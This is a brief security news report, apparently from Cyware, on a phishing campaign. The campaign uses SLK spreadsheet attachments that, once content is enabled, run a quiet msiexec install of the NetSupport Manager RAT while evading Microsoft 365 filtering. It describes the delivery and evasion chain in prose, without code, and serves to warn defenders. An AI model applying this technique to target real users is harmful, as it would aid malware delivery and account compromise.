A new attack tactic has been spotted that bypasses both Microsoft 365 default security (EOP) and advanced security (ATP).

What’s going on?
Avanan researchers revealed a glaring increase in the use of SLK (symbolic link) files against Microsoft 365 users. The threat actors send an email with an SLK attachment, containing a malicious macro to download and install a RAT.  

Know your SLK file:
  • The MS Office software recognizes the SLK file as an Excel file.
  • They link the data between databases and spreadsheets.
  • Similar to .xls or .xlsx files, the SLK file is capable of executing malicious commands.

About the attack:
  • SLK files are rare and receiving one, most probably, suggests that you have targeted. The attack was launched from thousands of Hotmail accounts.
  • The attack targets only Microsoft 365 accounts and until recently, was confined to a few organizations.
  • After enabling content, the commands in the file will be executed.
  • The EEXEC Excel command is used by the SLK file to share data between different spreadsheets.
  • The swan song is to run Windows Installer (msiexec) in quiet mode to install an MSI package. The payload was found to be the NetSupport Manager RAT.

The bottom line is that the attack was highly obfuscated, designed to bypass a certain layer of the Microsoft 365 security infrastructure. Every file is unique and no two attachments share the same MD5 hash. However, Gmail users are secure from this attack as Google blocks it on incoming email. 

Cyware Publisher